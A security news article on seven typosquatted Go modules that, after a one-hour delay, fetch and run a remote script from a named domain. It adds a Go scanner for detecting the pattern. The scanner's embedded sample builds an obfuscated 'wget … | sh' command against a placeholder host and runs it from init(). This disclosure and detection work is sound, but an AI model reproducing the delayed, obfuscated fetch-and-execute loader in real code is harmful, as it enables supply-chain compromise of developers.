Seven Malicious Go Packages Discovered Deploying Malware on Linux and macOS Systems

Security researchers have warned of an ongoing malicious campaign that targets the Go ecosystem with typosquatted modules designed to deploy loader malware on Linux and macOS systems.

According to a new report by Socket researcher Kirill Boychenko, at least seven packages impersonating popular Go libraries have been published, including one (github[.]com/shallowmulti/hypert) aimed specifically at financial-sector developers.

“These packages exhibit repeated malicious filenames and consistent obfuscation techniques, which point to a coordinated threat actor capable of rapid adaptation,” Boychenko said.

Although the packages remain available through the official Go module mirror (proxy.golang.org), which caches modules independently of their source repositories, the corresponding GitHub repositories have all been taken down except for github[.]com/ornatedoctrin/layout. The malicious Go packages identified are:

shallowmulti/hypert (github.com/shallowmulti/hypert)
shadowybulk/hypert (github.com/shadowybulk/hypert)
belatedplanet/hypert (github.com/belatedplanet/hypert)
thankfulmai/hypert (github.com/thankfulmai/hypert)
vainreboot/layout (github.com/vainreboot/layout)
ornatedoctrin/layout (github.com/ornatedoctrin/layout)
utilizedsun/layout (github.com/utilizedsun/layout)

Socket's analysis found that the packages contain code that achieves remote code execution by running an obfuscated shell command to fetch and execute a script from a remote server ("alturastreet[.]icu"). In an apparent effort to evade detection, the code waits one hour before fetching the remote script.

The end goal is to install and run an executable on the compromised system that could steal sensitive data or credentials.
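To make the described behaviour concrete, here is an added example (not code from Socket's report or from the malicious modules) of how a reviewer can scan Go sources in a vendor directory or module cache for the tell-tales above: an exec.Command call preceded by time.Sleep in the same function, a shell handed a command string, and a string slice assembled from many short fragments (array-based string obfuscation). The Scan and Suspicious functions, the Finding type, the thresholds and the embedded sample source are all assumptions of this example; the sample is a constructed stand-in that points at example.invalid and is only parsed, never compiled or run.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"go/types"
	"strings"
)

// Finding is one tell-tale: the line of the triggering function or literal and its kind
// (delayed-exec, shell-exec or fragmented-string).
type Finding struct{ Line int; Kind string }

// Constructed sample mimicking the reported pattern: a command assembled from short
// fragments, held back for an hour, then handed to a shell from init (which runs on import).
const sample = `package hypert
import ("os/exec"; "strings"; "time")
var parts = []string{"wg", "et", " -O", " - ", "htt", "ps:", "//e", "xam", "ple", ".inv", "alid", "/x", " | ", "sh"}
func init() {
	time.Sleep(3600 * time.Second)
	exec.Command("/bin/sh", "-c", strings.Join(parts, "")).Start()
}`

// strLit returns the unquoted text of a string literal expression, or "" otherwise.
func strLit(e ast.Expr) string {
	if lit, ok := e.(*ast.BasicLit); ok && lit.Kind == token.STRING {
		return strings.Trim(lit.Value, "\"`")
	}
	return ""
}

// shells lists command names whose first argument is treated as a shell invocation.
var shells = map[string]bool{"sh": true, "bash": true, "/bin/sh": true, "/bin/bash": true}

// Scan parses src and reports exec.Command preceded by time.Sleep in the same function,
// exec.Command of a shell, and string slices assembled from many short fragments.
func Scan(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	file, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var out []Finding
	report := func(n ast.Node, kind string) {
		out = append(out, Finding{fset.Position(n.Pos()).Line, kind})
	}
	for _, decl := range file.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Body == nil {
			continue
		}
		var sleeps, execs, shell bool
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			if call, ok := n.(*ast.CallExpr); ok {
				callee := types.ExprString(call.Fun) // e.g. "time.Sleep"
				sleeps = sleeps || callee == "time.Sleep"
				if callee == "exec.Command" && len(call.Args) > 0 {
					execs, shell = true, shell || shells[strLit(call.Args[0])]
				}
			}
			return true
		})
		if sleeps && execs {
			report(fn, "delayed-exec")
		}
		if shell {
			report(fn, "shell-exec")
		}
	}
	ast.Inspect(file, func(n ast.Node) bool {
		if lit, ok := n.(*ast.CompositeLit); ok {
			short := 0 // elements of three characters or fewer
			for _, e := range lit.Elts {
				if s := strLit(e); s != "" && len(s) <= 3 {
					short++
				}
			}
			if short >= 8 {
				report(lit, "fragmented-string")
			}
		}
		return true
	})
	return out, nil
}

// Suspicious applies a deliberately simple rule: two or more distinct tell-tales in one file.
func Suspicious(fs []Finding) bool {
	kinds := map[string]bool{}
	for _, f := range fs {
		kinds[f.Kind] = true
	}
	return len(kinds) >= 2
}

func main() {
	findings, _ := Scan("hypert.go", sample)
	fmt.Println(Suspicious(findings), findings)
}
```

The thresholds (fragments of three characters or fewer, eight of them, two distinct kinds to alert) are starting points, not a verdict: a plain exec.Command("git", "status") yields no finding, while the sample above yields three. Run Scan over every .go file under the module cache or vendor directory of a build and treat hits as prompts for manual review.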

This disclosure follows a previous Socket report on a similar software supply chain attack on the Go ecosystem, in which a malicious package gave the attacker remote access to compromised systems.

“The repeated use of identical filenames, string obfuscation techniques, and delayed execution tactics suggest a coordinated adversary with plans to persist and evolve,” Boychenko commented.

“The discovery of numerous malicious hypert and layout packages, coupled with multiple fallback domains, indicates a well-established infrastructure designed for long-term operation. This allows the threat actor to adapt and pivot whenever a domain or repository is blacklisted or removed,” he concluded.
